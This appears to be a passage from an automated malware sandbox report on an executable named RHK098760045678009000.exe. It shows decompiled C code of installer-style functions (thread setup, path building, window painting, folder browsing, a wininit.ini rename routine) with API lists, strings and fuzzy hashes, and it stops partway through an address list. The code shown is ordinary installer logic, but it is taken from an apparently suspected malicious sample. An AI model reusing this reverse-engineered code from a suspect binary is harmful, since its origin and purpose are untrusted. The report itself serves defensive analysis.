                • Opcode Fuzzy Hash: 1798247d7b7fc50258c29a0d8842d8596947dcfb78ae24f73fc7e5e40567b794
                • Instruction Fuzzy Hash: 0161D571A40309BBEB109F60DD45F6A7B69FB54715F108036FB04BA2D1C7B8AA51CF98
                Uniqueness

                Uniqueness Score: -1.00%

                Function 6FF82880, Relevance: 36.9, APIs: 17, Strings: 4, Instructions: 119synchronizationthreadCOMMON
                Download Yara Rule
                C-Code - Quality: 86%
                			E6FF82880(void* _a4, signed int _a8, intOrPtr _a12) {
				void* _v8;
				long _v12;
				void* _v16;
				void* _v20;
				void* _v24;
				intOrPtr _t45;

				_v8 = _a4;
				_t45 = _a4;
				0x6ff80000("%p %d %p\n", _t45, _a8, _a12);
				EnterCriticalSection(0x6ff850ac);
				if(_v8 == 0 ||  *_v8 != 0x50444830) {
					LeaveCriticalSection(0x6ff850ac);
					return 0xc0000bbc;
				} else {
					0x6ff80000(0);
					if(_t45 == 0) {
						if( *(_v8 + 8) == 0) {
							_v16 = CreateEventW(0, 0, 0, 0);
							 *(_v8 + 0x14) = _v16;
							if(_v16 != 0) {
								L11:
								 *((intOrPtr*)(_v8 + 0x10)) = _a12;
								 *(_v8 + 0xc) = _a8 * 0x3e8;
								_v20 = CreateThread(0, 0, E6FF82EC0, _v8, 0, 0);
								 *(_v8 + 8) = _v20;
								if(_v20 != 0) {
									LeaveCriticalSection(0x6ff850ac);
									return 0;
								}
								_v12 = GetLastError();
								CloseHandle( *(_v8 + 0x14));
								LeaveCriticalSection(0x6ff850ac);
								return _v12;
							}
							_v12 = GetLastError();
							LeaveCriticalSection(0x6ff850ac);
							return _v12;
						}
						_v24 =  *(_v8 + 8);
						SetEvent( *(_v8 + 0x14));
						LeaveCriticalSection(0x6ff850ac);
						WaitForSingleObject(_v24, 0xffffffff);
						EnterCriticalSection(0x6ff850ac);
						if( *_v8 == 0x50444830) {
							CloseHandle( *(_v8 + 8));
							 *(_v8 + 8) = 0;
							goto L11;
						}
						LeaveCriticalSection(0x6ff850ac);
						return 0xc0000bbc;
					}
					LeaveCriticalSection(0x6ff850ac);
					return 0x800007d5;
				}
			}









                0x6ff82889
                0x6ff82894
                0x6ff8289d
                0x6ff828aa
                0x6ff828b4
                0x6ff828c6
                0x00000000
                0x6ff828d6
                0x6ff828d8
                0x6ff828e2
                0x6ff82900
                0x6ff82981
                0x6ff8298a
                0x6ff82991
                0x6ff829ac
                0x6ff829b2
                0x6ff829bf
                0x6ff829d9
                0x6ff829e2
                0x6ff829e9
                0x6ff82a16
                0x00000000
                0x6ff82a1c
                0x6ff829f1
                0x6ff829fb
                0x6ff82a06
                0x00000000
                0x6ff82a0c
                0x6ff82999
                0x6ff829a1
                0x00000000
                0x6ff829a7
                0x6ff82908
                0x6ff82912
                0x6ff8291d
                0x6ff82929
                0x6ff82934
                0x6ff82943
                0x6ff82961
                0x6ff8296a
                0x00000000
                0x6ff8296a
                0x6ff8294a
                0x00000000
                0x6ff82950
                0x6ff828e9
                0x00000000
                0x6ff828ef

                APIs
                • EnterCriticalSection.KERNEL32(6FF850AC), ref: 6FF828AA
                • LeaveCriticalSection.KERNEL32(6FF850AC), ref: 6FF828C6
                • LeaveCriticalSection.KERNEL32(6FF850AC), ref: 6FF828E9
                • SetEvent.KERNEL32(?), ref: 6FF82912
                • LeaveCriticalSection.KERNEL32(6FF850AC), ref: 6FF8291D
                • WaitForSingleObject.KERNEL32(?,000000FF), ref: 6FF82929
                • EnterCriticalSection.KERNEL32(6FF850AC), ref: 6FF82934
                • LeaveCriticalSection.KERNEL32(6FF850AC), ref: 6FF8294A
                • CloseHandle.KERNEL32(?), ref: 6FF82961
                • CreateEventW.KERNEL32(00000000,00000000,00000000,00000000), ref: 6FF8297B
                • GetLastError.KERNEL32 ref: 6FF82993
                • LeaveCriticalSection.KERNEL32(6FF850AC), ref: 6FF829A1
                • CreateThread.KERNEL32 ref: 6FF829D3
                • GetLastError.KERNEL32 ref: 6FF829EB
                • CloseHandle.KERNEL32(?), ref: 6FF829FB
                • LeaveCriticalSection.KERNEL32(6FF850AC), ref: 6FF82A06
                Strings
                Memory Dump Source
                • Source File: 00000008.00000002.292808279.000000006FF81000.00000020.00020000.sdmp, Offset: 6FF80000, based on PE: true
                • Associated: 00000008.00000002.292794605.000000006FF80000.00000002.00020000.sdmp Download File
                • Associated: 00000008.00000002.292828297.000000006FF84000.00000002.00020000.sdmp Download File
                • Associated: 00000008.00000002.292861128.000000006FF85000.00000040.00020000.sdmp Download File
                • Associated: 00000008.00000002.292906890.000000006FF87000.00000002.00020000.sdmp Download File
                Similarity
                • API ID: CriticalSection$Leave$CloseCreateEnterErrorEventHandleLast$ObjectSingleThreadWait
                • String ID: %p %d %p$0HDP$0HDP$p-w
                • API String ID: 2526439713-1736687199
                • Opcode ID: 15ee23f421c7cce957212dba39bef2b79a34ef504cfb12fd50ab0481495cd395
                • Instruction ID: 9e26eaaceed103b7c00b2e95c726e841bbef9ce75a078a2b9328904f45becd65
                • Opcode Fuzzy Hash: 15ee23f421c7cce957212dba39bef2b79a34ef504cfb12fd50ab0481495cd395
                • Instruction Fuzzy Hash: 6E514F75910208EFDB04DF98CA49B6EBBB5BF0A321F204185F926AB390D771AE40CF51
                Uniqueness

                Uniqueness Score: -1.00%

                Function 6FF81EA0, Relevance: 31.6, APIs: 15, Strings: 3, Instructions: 142stringCOMMON
                Download Yara Rule
                C-Code - Quality: 74%
                			E6FF81EA0(WCHAR** _a4, WCHAR* _a8, intOrPtr* _a12, intOrPtr _a16) {
				intOrPtr _v8;
				intOrPtr _v12;
				short _v36;
				short _v2084;
				int _t80;
				void* _t122;
				void* _t123;
				void* _t124;

				_v12 = 0;
				0x6ff80000("%p %p %p 0x%08x\n", _a4, _a8, _a12, _a16);
				_t124 = _t123 + 0x14;
				if(_a16 != 0) {
					0x6ff80000("unimplemented flags 0x%08x\n", _a16);
					_t124 = _t124 + 8;
				}
				if(_a4 == 0 || _a4[5] == 0 || _a4[1] == 0 || _a12 == 0) {
					return 0xc0000bbd;
				} else {
					 *((short*)(_t122 + 0xfffffffffffff7e0)) = 0;
					if( *_a4 != 0) {
						lstrcatW( &_v2084, 0x6ff86944);
						lstrcatW( &_v2084,  *_a4);
					}
					lstrcatW( &_v2084, 0x6ff8694c);
					lstrcatW( &_v2084, _a4[1]);
					if(_a4[2] != 0) {
						lstrcatW( &_v2084, 0x6ff86950);
						if(_a4[3] != 0) {
							lstrcatW( &_v2084, _a4[3]);
							lstrcatW( &_v2084, 0x6ff86954);
						}
						lstrcatW( &_v2084, _a4[2]);
						_t80 = _a4[4];
						0x6ff80000( &_v36, "#%u", _t80);
						swprintf( &_v36, _t80);
						lstrcatW( &_v2084,  &_v36);
						lstrcatW( &_v2084, 0x6ff86960);
					}
					lstrcatW( &_v2084, 0x6ff86964);
					lstrcatW( &_v2084, _a4[5]);
					_v8 = lstrlenW( &_v2084) + 1;
					if( *_a12 < _v8) {
						_v12 = 0x800007d2;
					} else {
						lstrcpyW(_a8,  &_v2084);
					}
					 *_a12 = _v8;
					return _v12;
				}
			}











                0x6ff81ea9
                0x6ff81ec5
                0x6ff81eca
                0x6ff81ed1
                0x6ff81edc
                0x6ff81ee1
                0x6ff81ee1
                0x6ff81ee8
                0x00000000
                0x6ff81f0c
                0x6ff81f16
                0x6ff81f24
                0x6ff81f32
                0x6ff81f45
                0x6ff81f45
                0x6ff81f57
                0x6ff81f6b
                0x6ff81f78
                0x6ff81f8a
                0x6ff81f97
                0x6ff81fa7
                0x6ff81fb9
                0x6ff81fb9
                0x6ff81fcd
                0x6ff81fd6
                0x6ff81fe3
                0x6ff81ff0
                0x6ff82003
                0x6ff82015
                0x6ff82015
                0x6ff82027
                0x6ff8203b
                0x6ff82051
                0x6ff8205c
                0x6ff82071
                0x6ff8205e
                0x6ff82069
                0x6ff82069
                0x6ff8207e
                0x00000000
                0x6ff82080

                APIs
                Strings
                Memory Dump Source
                • Source File: 00000008.00000002.292808279.000000006FF81000.00000020.00020000.sdmp, Offset: 6FF80000, based on PE: true
                • Associated: 00000008.00000002.292794605.000000006FF80000.00000002.00020000.sdmp Download File
                • Associated: 00000008.00000002.292828297.000000006FF84000.00000002.00020000.sdmp Download File
                • Associated: 00000008.00000002.292861128.000000006FF85000.00000040.00020000.sdmp Download File
                • Associated: 00000008.00000002.292906890.000000006FF87000.00000002.00020000.sdmp Download File
                Similarity
                • API ID: lstrcat$lstrcpylstrlenswprintf
                • String ID: #%u$%p %p %p 0x%08x$unimplemented flags 0x%08x
                • API String ID: 332791676-533629115
                • Opcode ID: 307095165d29ec6393a97fd00ea0ce27c76da4e30f67088b35d1c08d403a74d5
                • Instruction ID: 2adef8c7920b954a05a6c037ac88030944e91c77098ddb34c964dda4b346e77b
                • Opcode Fuzzy Hash: 307095165d29ec6393a97fd00ea0ce27c76da4e30f67088b35d1c08d403a74d5
                • Instruction Fuzzy Hash: B9512875510208ABCB04DF94C984FEA77B9FB49311F048589F9299B341DB36EA98CFA0
                Uniqueness

                Uniqueness Score: -1.00%

                Function 00401000, Relevance: 28.1, APIs: 14, Strings: 2, Instructions: 125COMMON
                Download Yara Rule
                C-Code - Quality: 90%
                			E00401000(struct HWND__* _a4, void* _a8, signed int _a12, void* _a16) {
				struct tagLOGBRUSH _v16;
				struct tagRECT _v32;
				struct tagPAINTSTRUCT _v96;
				struct HDC__* _t70;
				struct HBRUSH__* _t87;
				struct HFONT__* _t94;
				long _t102;
				intOrPtr _t115;
				signed int _t126;
				struct HDC__* _t128;
				intOrPtr _t130;

				if(_a8 == 0xf) {
					_t130 =  *0x423f50; // 0x58d7c8
					_t70 = BeginPaint(_a4,  &_v96);
					_v16.lbStyle = _v16.lbStyle & 0x00000000;
					_a8 = _t70;
					GetClientRect(_a4,  &_v32);
					_t126 = _v32.bottom;
					_v32.bottom = _v32.bottom & 0x00000000;
					while(_v32.top < _t126) {
						_a12 = _t126 - _v32.top;
						asm("cdq");
						asm("cdq");
						asm("cdq");
						_v16.lbColor = 0 << 0x00000008 | (( *(_t130 + 0x50) & 0x000000ff) * _a12 + ( *(_t130 + 0x54) & 0x000000ff) * _v32.top) / _t126 & 0x000000ff;
						_t87 = CreateBrushIndirect( &_v16);
						_v32.bottom = _v32.bottom + 4;
						_a16 = _t87;
						FillRect(_a8,  &_v32, _t87);
						DeleteObject(_a16);
						_v32.top = _v32.top + 4;
					}
					if( *(_t130 + 0x58) != 0xffffffff) {
						_t94 = CreateFontIndirectA( *(_t130 + 0x34));
						_a16 = _t94;
						if(_t94 != 0) {
							_t128 = _a8;
							_v32.left = 0x10;
							_v32.top = 8;
							SetBkMode(_t128, 1);
							SetTextColor(_t128,  *(_t130 + 0x58));
							_a8 = SelectObject(_t128, _a16);
							DrawTextA(_t128, "aufce Setup", 0xffffffff,  &_v32, 0x820);
							SelectObject(_t128, _a8);
							DeleteObject(_a16);
						}
					}
					EndPaint(_a4,  &_v96);
					return 0;
				}
				_t102 = _a16;
				if(_a8 == 0x46) {
					 *(_t102 + 0x18) =  *(_t102 + 0x18) | 0x00000010;
					_t115 =  *0x423f48; // 0x1900f6
					 *((intOrPtr*)(_t102 + 4)) = _t115;
				}
				return DefWindowProcA(_a4, _a8, _a12, _t102);
			}














                0x0040100a
                0x00401039
                0x00401047
                0x0040104d
                0x00401051
                0x0040105b
                0x00401061
                0x00401064
                0x004010f3
                0x00401089
                0x0040108c
                0x004010a6
                0x004010bd
                0x004010cc
                0x004010cf
                0x004010d5
                0x004010d9
                0x004010e4
                0x004010ed
                0x004010ef
                0x004010ef
                0x00401100
                0x00401105
                0x0040110d
                0x00401110
                0x00401112
                0x00401118
                0x0040111f
                0x00401126
                0x00401130
                0x00401142
                0x00401156
                0x00401160
                0x00401165
                0x00401165
                0x00401110
                0x0040116e
                0x00000000
                0x00401178
                0x00401010
                0x00401013
                0x00401015
                0x00401019
                0x0040101f
                0x0040101f
                0x00000000

                APIs
                • DefWindowProcA.USER32(?,00000046,?,?), ref: 0040102C
                • BeginPaint.USER32(?,?), ref: 00401047
                • GetClientRect.USER32 ref: 0040105B
                • CreateBrushIndirect.GDI32(00000000), ref: 004010CF
                • FillRect.USER32 ref: 004010E4
                • DeleteObject.GDI32(?), ref: 004010ED
                • CreateFontIndirectA.GDI32(?), ref: 00401105
                • SetBkMode.GDI32(00000000,00000001), ref: 00401126
                • SetTextColor.GDI32(00000000,?), ref: 00401130
                • SelectObject.GDI32(00000000,?), ref: 00401140
                • DrawTextA.USER32(00000000,aufce Setup,000000FF,00000010,00000820), ref: 00401156
                • SelectObject.GDI32(00000000,00000000), ref: 00401160
                • DeleteObject.GDI32(?), ref: 00401165
                • EndPaint.USER32(?,?), ref: 0040116E
                Strings
                Memory Dump Source
                • Source File: 00000008.00000002.289929586.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                • Associated: 00000008.00000002.289868632.0000000000400000.00000002.00020000.sdmp Download File
                • Associated: 00000008.00000002.289964819.0000000000407000.00000002.00020000.sdmp Download File
                • Associated: 00000008.00000002.290014852.0000000000409000.00000004.00020000.sdmp Download File
                • Associated: 00000008.00000002.290078414.0000000000417000.00000004.00020000.sdmp Download File
                • Associated: 00000008.00000002.290084814.0000000000422000.00000004.00020000.sdmp Download File
                • Associated: 00000008.00000002.290095675.000000000042A000.00000004.00020000.sdmp Download File
                • Associated: 00000008.00000002.290154899.000000000042D000.00000002.00020000.sdmp Download File
                • Associated: 00000008.00000002.290281669.000000000043D000.00000002.00020000.sdmp Download File
                Similarity
                • API ID: Object$CreateDeleteIndirectPaintRectSelectText$BeginBrushClientColorDrawFillFontModeProcWindow
                • String ID: F$aufce Setup
                • API String ID: 941294808-97540220
                • Opcode ID: cae46454919e7fa79772e51e967b3c1ae0100adcfe078b8b521791772386bd0b
                • Instruction ID: 81ce27436f0092abe3ce3185f2c65b9207eacd25275343976a1476a18aae1cf1
                • Opcode Fuzzy Hash: cae46454919e7fa79772e51e967b3c1ae0100adcfe078b8b521791772386bd0b
                • Instruction Fuzzy Hash: 06418B71804249AFCB058F95DD459AFBBB9FF44315F00802AF961AA2A0C738EA51DFA5
                Uniqueness

                Uniqueness Score: -1.00%

                Function 00404292, Relevance: 24.8, APIs: 10, Strings: 4, Instructions: 273stringCOMMON
                Download Yara Rule
                C-Code - Quality: 78%
                			E00404292(unsigned int __edx, struct HWND__* _a4, intOrPtr _a8, unsigned int _a12, intOrPtr _a16) {
				signed int _v8;
				signed int _v12;
				long _v16;
				long _v20;
				long _v24;
				char _v28;
				intOrPtr _v32;
				long _v36;
				char _v40;
				unsigned int _v44;
				signed int _v48;
				CHAR* _v56;
				intOrPtr _v60;
				intOrPtr _v64;
				intOrPtr _v68;
				CHAR* _v72;
				void _v76;
				struct HWND__* _v80;
				void* __ebx;
				void* __edi;
				void* __esi;
				intOrPtr _t82;
				long _t87;
				signed char* _t89;
				void* _t95;
				signed int _t96;
				int _t109;
				signed short _t114;
				signed int _t118;
				struct HWND__** _t122;
				intOrPtr _t124;
				intOrPtr* _t138;
				CHAR* _t146;
				intOrPtr _t147;
				unsigned int _t150;
				signed int _t152;
				unsigned int _t156;
				signed int _t158;
				signed int* _t159;
				struct HWND__* _t165;
				struct HWND__* _t166;
				int _t168;
				unsigned int _t197;

				_t156 = __edx;
				_t82 =  *0x41fd08;
				_v32 = _t82;
				_t146 = ( *(_t82 + 0x3c) << 0xa) + 0x425000;
				_v12 =  *((intOrPtr*)(_t82 + 0x38));
				if(_a8 == 0x40b) {
					E0040543D(0x3fb, _t146);
					E00405DFA(_t146);
				}
				_t166 = _a4;
				if(_a8 != 0x110) {
					L8:
					if(_a8 != 0x111) {
						L20:
						if(_a8 == 0x40f) {
							L22:
							_v8 = _v8 & 0x00000000;
							_v12 = _v12 & 0x00000000;
							E0040543D(0x3fb, _t146);
							if(E0040576C(_t185, _t146) == 0) {
								_v8 = 1;
							}
							E00405B98(0x41f500, _t146);
							_t87 = E00405F28(1);
							_v16 = _t87;
							if(_t87 == 0) {
								L30:
								E00405B98(0x41f500, _t146);
								_t89 = E0040571F(0x41f500);
								_t158 = 0;
								if(_t89 != 0) {
									 *_t89 =  *_t89 & 0x00000000;
								}
								if(GetDiskFreeSpaceA(0x41f500,  &_v20,  &_v24,  &_v16,  &_v36) == 0) {
									goto L35;
								} else {
									_t168 = 0x400;
									_t109 = MulDiv(_v20 * _v24, _v16, 0x400);
									asm("cdq");
									_v48 = _t109;
									_v44 = _t156;
									_v12 = 1;
									goto L36;
								}
							} else {
								_t159 = 0;
								if(0 == 0x41f500) {
									goto L30;
								} else {
									goto L26;
								}
								while(1) {
									L26:
									_t114 = _v16(0x41f500,  &_v48,  &_v28,  &_v40);
									if(_t114 != 0) {
										break;
									}
									if(_t159 != 0) {
										 *_t159 =  *_t159 & _t114;
									}
									_t159 = E004056D2(0x41f500) - 1;
									 *_t159 = 0x5c;
									if(_t159 != 0x41f500) {
										continue;
									} else {
										goto L30;
									}
								}
								_t150 = _v44;
								_v48 = (_t150 << 0x00000020 | _v48) >> 0xa;
								_v44 = _t150 >> 0xa;
								_v12 = 1;
								_t158 = 0;
								__eflags = 0;
								L35:
								_t168 = 0x400;
								L36:
								_t95 = E00404726(5);
								if(_v12 != _t158) {
									_t197 = _v44;
									if(_t197 <= 0 && (_t197 < 0 || _v48 < _t95)) {
										_v8 = 2;
									}
								}
								_t147 =  *0x42371c; // 0x59455b
								if( *((intOrPtr*)(_t147 + 0x10)) != _t158) {
									E0040470E(0x3ff, 0xfffffffb, _t95);
									if(_v12 == _t158) {
										SetDlgItemTextA(_a4, _t168, 0x41f4f0);
									} else {
										E00404649(_t168, 0xfffffffc, _v48, _v44);
									}
								}
								_t96 = _v8;
								 *0x423fe4 = _t96;
								if(_t96 == _t158) {
									_v8 = E0040140B(7);
								}
								if(( *(_v32 + 0x14) & _t168) != 0) {
									_v8 = _t158;
								}
								E00403E76(0 | _v8 == _t158);
								if(_v8 == _t158 &&  *0x420524 == _t158) {
									E00404227();
								}
								 *0x420524 = _t158;
								goto L53;
							}
						}
						_t185 = _a8 - 0x405;
						if(_a8 != 0x405) {
							goto L53;
						}
						goto L22;
					}
					_t118 = _a12 & 0x0000ffff;
					if(_t118 != 0x3fb) {
						L12:
						if(_t118 == 0x3e9) {
							_t152 = 7;
							memset( &_v76, 0, _t152 << 2);
							_v80 = _t166;
							_v72 = 0x420538;
							_v60 = E004045E3;
							_v56 = _t146;
							_v68 = E00405BBA(_t146, 0x420538, _t166, 0x41f908, _v12);
							_t122 =  &_v80;
							_v64 = 0x41;
							__imp__SHBrowseForFolderA(_t122);
							if(_t122 == 0) {
								_a8 = 0x40f;
							} else {
								__imp__CoTaskMemFree(_t122);
								E0040568B(_t146);
								_t124 =  *0x423f50; // 0x58d7c8
								_t125 =  *((intOrPtr*)(_t124 + 0x11c));
								if( *((intOrPtr*)(_t124 + 0x11c)) != 0 && _t146 == "C:\\Users\\FRONTD~1\\AppData\\Local\\Temp") {
									E00405BBA(_t146, 0x420538, _t166, 0, _t125);
									if(lstrcmpiA(0x422ee0, 0x420538) != 0) {
										lstrcatA(_t146, 0x422ee0);
									}
								}
								 *0x420524 =  *0x420524 + 1;
								SetDlgItemTextA(_t166, 0x3fb, _t146);
							}
						}
						goto L20;
					}
					if(_a12 >> 0x10 != 0x300) {
						goto L53;
					}
					_a8 = 0x40f;
					goto L12;
				} else {
					_t165 = GetDlgItem(_t166, 0x3fb);
					if(E004056F8(_t146) != 0 && E0040571F(_t146) == 0) {
						E0040568B(_t146);
					}
					 *0x423718 = _t166;
					SetWindowTextA(_t165, _t146);
					_push( *((intOrPtr*)(_a16 + 0x34)));
					_push(1);
					E00403E54(_t166);
					_push( *((intOrPtr*)(_a16 + 0x30)));
					_push(0x14);
					E00403E54(_t166);
					E00403E89(_t165);
					_t138 = E00405F28(0xa);
					if(_t138 == 0) {
						L53:
						return E00403EBB(_a8, _a12, _a16);
					} else {
						 *_t138(_t165, 1);
						goto L8;
					}
				}
			}














































                0x00404292
                0x00404298
                0x0040429e
                0x004042ab
                0x004042b9
                0x004042bc
                0x004042c4
                0x004042ca
                0x004042ca
                0x004042d6
                0x004042d9
                0x00404347
                0x0040434e
                0x00404425
                0x0040442c
                0x0040443b
                0x0040443b
                0x0040443f
                0x00404449
                0x00404456
                0x00404458
                0x00404458
                0x00404466
                0x0040446d
                0x00404474
                0x00404477
                0x004044ae
                0x004044b0
                0x004044b6
                0x004044bb
                0x004044bf
                0x004044c1
                0x004044c1
                0x004044dd
                0x00000000
                0x004044df
                0x004044e2
                0x004044f0
                0x004044f6
                0x004044f7
                0x004044fa
                0x004044fd
                0x00000000
                0x004044fd
                0x00404479
                0x0040447b
                0x0040447f
                0x00000000
                0x00000000
                0x00000000
                0x00000000
                0x00404481
                0x00404481
                0x0040448e
                0x00404493
                0x00000000
                0x00000000
                0x00404497
                0x00404499
                0x00404499
                0x004044a4
                0x004044a7
                0x004044ac
                0x00000000
                0x00000000
                0x00000000
                0x00000000
                0x004044ac
                0x00404509
                0x00404513
                0x00404516
                0x00404519
                0x00404520
                0x00404520
                0x00404522
                0x00404522
                0x00404527
                0x00404529
                0x00404531
                0x00404538
                0x0040453a
                0x00404545
                0x00404545
                0x0040453a
                0x0040454c
                0x00404555
                0x0040455f
                0x00404567
                0x00404582
                0x00404569
                0x00404572
                0x00404572
                0x00404567
                0x00404587
                0x0040458c
                0x00404591
                0x0040459a
                0x0040459a
                0x004045a3
                0x004045a5
                0x004045a5
                0x004045b1
                0x004045b9
                0x004045c3
                0x004045c3
                0x004045c8
                0x00000000
                0x004045c8
                0x00404477
                0x0040442e
                0x00404435
                0x00000000
                0x00000000
                0x00000000
                0x00404435
                0x00404354
                0x0040435d
                0x00404377
                0x0040437c
                0x00404386
                0x0040438d
                0x00404399
                0x0040439c
                0x0040439f
                0x004043a6
                0x004043ae
                0x004043b1
                0x004043b5
                0x004043bc
                0x004043c4
                0x0040441e
                0x004043c6
                0x004043c7
                0x004043ce
                0x004043d3
                0x004043d8
                0x004043e0
                0x004043ed
                0x00404401
                0x00404405
                0x00404405
                0x00404401
                0x0040440a
                0x00404417
                0x00404417
                0x004043c4
                0x00000000
                0x0040437c
                0x0040436a
                0x00000000
                0x00000000
                0x00404370
                0x00000000
                0x004042db
                0x004042e8
                0x004042f1
                0x004042fe
                0x004042fe
                0x00404305
                0x0040430b
                0x00404314
                0x00404317
                0x0040431a
                0x00404322
                0x00404325
                0x00404328
                0x0040432e
                0x00404335
                0x0040433c
                0x004045ce
                0x004045e0
                0x00404342
                0x00404345
                0x00000000
                0x00404345
                0x0040433c

                APIs
                • GetDlgItem.USER32 ref: 004042E1
                • SetWindowTextA.USER32(00000000,?), ref: 0040430B
                • SHBrowseForFolderA.SHELL32(?,0041F908,?), ref: 004043BC
                • CoTaskMemFree.OLE32(00000000), ref: 004043C7
                • lstrcmpiA.KERNEL32(ymvwfuvwx,00420538,00000000,?,?), ref: 004043F9
                • lstrcatA.KERNEL32(?,ymvwfuvwx), ref: 00404405
                • SetDlgItemTextA.USER32(?,000003FB,?), ref: 00404417
                  • Part of subcall function 0040543D: GetDlgItemTextA.USER32 ref: 00405450
                  • Part of subcall function 00405DFA: CharNextA.USER32(?,*?|<>/":,00000000,C:\Users\user\Desktop\RHK098760045678009000.exe 0,C:\Users\user~1\AppData\Local\Temp\,C:\Users\user~1\AppData\Local\Temp\,00000000,004030D6,C:\Users\user~1\AppData\Local\Temp\,?,00403289), ref: 00405E52
                  • Part of subcall function 00405DFA: CharNextA.USER32(?,?,?,00000000), ref: 00405E5F
                  • Part of subcall function 00405DFA: CharNextA.USER32(?,C:\Users\user\Desktop\RHK098760045678009000.exe 0,C:\Users\user~1\AppData\Local\Temp\,C:\Users\user~1\AppData\Local\Temp\,00000000,004030D6,C:\Users\user~1\AppData\Local\Temp\,?,00403289), ref: 00405E64
                  • Part of subcall function 00405DFA: CharPrevA.USER32(?,?,C:\Users\user~1\AppData\Local\Temp\,C:\Users\user~1\AppData\Local\Temp\,00000000,004030D6,C:\Users\user~1\AppData\Local\Temp\,?,00403289), ref: 00405E74
                • GetDiskFreeSpaceA.KERNEL32(0041F500,?,?,0000040F,?,0041F500,0041F500,?,00000001,0041F500,?,?,000003FB,?), ref: 004044D5
                • MulDiv.KERNEL32(?,0000040F,00000400), ref: 004044F0
                  • Part of subcall function 00404649: lstrlenA.KERNEL32(00420538,00420538,?,%u.%u%s%s,00000005,00000000,00000000,?,000000DC,00000000,00404564,000000DF,00000000,00000400,?), ref: 004046E7
                  • Part of subcall function 00404649: wsprintfA.USER32 ref: 004046EF
                  • Part of subcall function 00404649: SetDlgItemTextA.USER32(?,00420538), ref: 00404702
                Strings
                Memory Dump Source
                • Source File: 00000008.00000002.289929586.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                • Associated: 00000008.00000002.289868632.0000000000400000.00000002.00020000.sdmp Download File
                • Associated: 00000008.00000002.289964819.0000000000407000.00000002.00020000.sdmp Download File
                • Associated: 00000008.00000002.290014852.0000000000409000.00000004.00020000.sdmp Download File
                • Associated: 00000008.00000002.290078414.0000000000417000.00000004.00020000.sdmp Download File
                • Associated: 00000008.00000002.290084814.0000000000422000.00000004.00020000.sdmp Download File
                • Associated: 00000008.00000002.290095675.000000000042A000.00000004.00020000.sdmp Download File
                • Associated: 00000008.00000002.290154899.000000000042D000.00000002.00020000.sdmp Download File
                • Associated: 00000008.00000002.290281669.000000000043D000.00000002.00020000.sdmp Download File
                Similarity
                • API ID: CharItemText$Next$Free$BrowseDiskFolderPrevSpaceTaskWindowlstrcatlstrcmpilstrlenwsprintf
                • String ID: A$C:\Users\user~1\AppData\Local\Temp$[EY$ymvwfuvwx
                • API String ID: 2624150263-4000944887
                • Opcode ID: fb58f5be01c1fbab376fe3aca88381438e011d3cf0c95fbb8aa79c4ccef87f62
                • Instruction ID: cfccd4b73e861dd9bc9b7885d3f414f2f86db1ffcc16c92a650f1104495a78a5
                • Opcode Fuzzy Hash: fb58f5be01c1fbab376fe3aca88381438e011d3cf0c95fbb8aa79c4ccef87f62
                • Instruction Fuzzy Hash: EAA17EB1D00218BBDB11AFA5CD41AAFB6B8EF84315F10813BF605B62D1D77C9A418F69
                Uniqueness

                Uniqueness Score: -1.00%

                Function 004058E6, Relevance: 24.6, APIs: 11, Strings: 3, Instructions: 144filememoryCOMMON
                Download Yara Rule
                C-Code - Quality: 93%
                			E004058E6(void* __eflags) {
				void* __ebx;
				void* __edi;
				void* __esi;
				intOrPtr* _t15;
				long _t16;
				intOrPtr _t18;
				int _t20;
				void* _t28;
				long _t29;
				intOrPtr* _t37;
				int _t43;
				void* _t44;
				long _t47;
				CHAR* _t49;
				void* _t51;
				void* _t53;
				intOrPtr* _t54;
				void* _t55;
				void* _t56;

				_t15 = E00405F28(2);
				_t49 =  *(_t55 + 0x18);
				if(_t15 != 0) {
					_t20 =  *_t15( *(_t55 + 0x1c), _t49, 5);
					if(_t20 != 0) {
						L16:
						 *0x423fd0 =  *0x423fd0 + 1;
						return _t20;
					}
				}
				 *0x4226c8 = 0x4c554e;
				if(_t49 == 0) {
					L5:
					_t16 = GetShortPathNameA( *(_t55 + 0x1c), 0x422140, 0x400);
					if(_t16 != 0 && _t16 <= 0x400) {
						_t43 = wsprintfA(0x421d40, "%s=%s\r\n", 0x4226c8, 0x422140);
						_t18 =  *0x423f50; // 0x58d7c8
						_t56 = _t55 + 0x10;
						E00405BBA(_t43, 0x400, 0x422140, 0x422140,  *((intOrPtr*)(_t18 + 0x128)));
						_t20 = E0040586F(0x422140, 0xc0000000, 4);
						_t53 = _t20;
						 *(_t56 + 0x14) = _t53;
						if(_t53 == 0xffffffff) {
							goto L16;
						}
						_t47 = GetFileSize(_t53, 0);
						_t7 = _t43 + 0xa; // 0xa
						_t51 = GlobalAlloc(0x40, _t47 + _t7);
						if(_t51 == 0 || ReadFile(_t53, _t51, _t47, _t56 + 0x18, 0) == 0 || _t47 !=  *(_t56 + 0x18)) {
							L15:
							_t20 = CloseHandle(_t53);
							goto L16;
						} else {
							if(E004057E4(_t51, "[Rename]\r\n") != 0) {
								_t28 = E004057E4(_t26 + 0xa, 0x4093e4);
								if(_t28 == 0) {
									L13:
									_t29 = _t47;
									L14:
									E00405830(_t51 + _t29, 0x421d40, _t43);
									SetFilePointer(_t53, 0, 0, 0);
									WriteFile(_t53, _t51, _t47 + _t43, _t56 + 0x18, 0);
									GlobalFree(_t51);
									goto L15;
								}
								_t37 = _t28 + 1;
								_t44 = _t51 + _t47;
								_t54 = _t37;
								if(_t37 >= _t44) {
									L21:
									_t53 =  *(_t56 + 0x14);
									_t29 = _t37 - _t51;
									goto L14;
								} else {
									goto L20;
								}
								do {
									L20:
									 *((char*)(_t43 + _t54)) =  *_t54;
									_t54 = _t54 + 1;
								} while (_t54 < _t44);
								goto L21;
							}
							E00405B98(_t51 + _t47, "[Rename]\r\n");
							_t47 = _t47 + 0xa;
							goto L13;
						}
					}
				} else {
					CloseHandle(E0040586F(_t49, 0, 1));
					_t16 = GetShortPathNameA(_t49, 0x4226c8, 0x400);
					if(_t16 != 0 && _t16 <= 0x400) {
						goto L5;
					}
				}
				return _t16;
			}






















                0x004058ec
                0x004058f3
                0x004058f7
                0x00405900
                0x00405904
                0x00405a43
                0x00405a43
                0x00000000
                0x00405a43
                0x00405904
                0x00405910
                0x00405926
                0x0040594e
                0x00405959
                0x0040595d
                0x0040597d
                0x0040597f
                0x00405984
                0x0040598e
                0x0040599b
                0x004059a0
                0x004059a5
                0x004059a9
                0x00000000
                0x00000000
                0x004059b8
                0x004059ba
                0x004059c7
                0x004059cb
                0x00405a3c
                0x00405a3d
                0x00000000
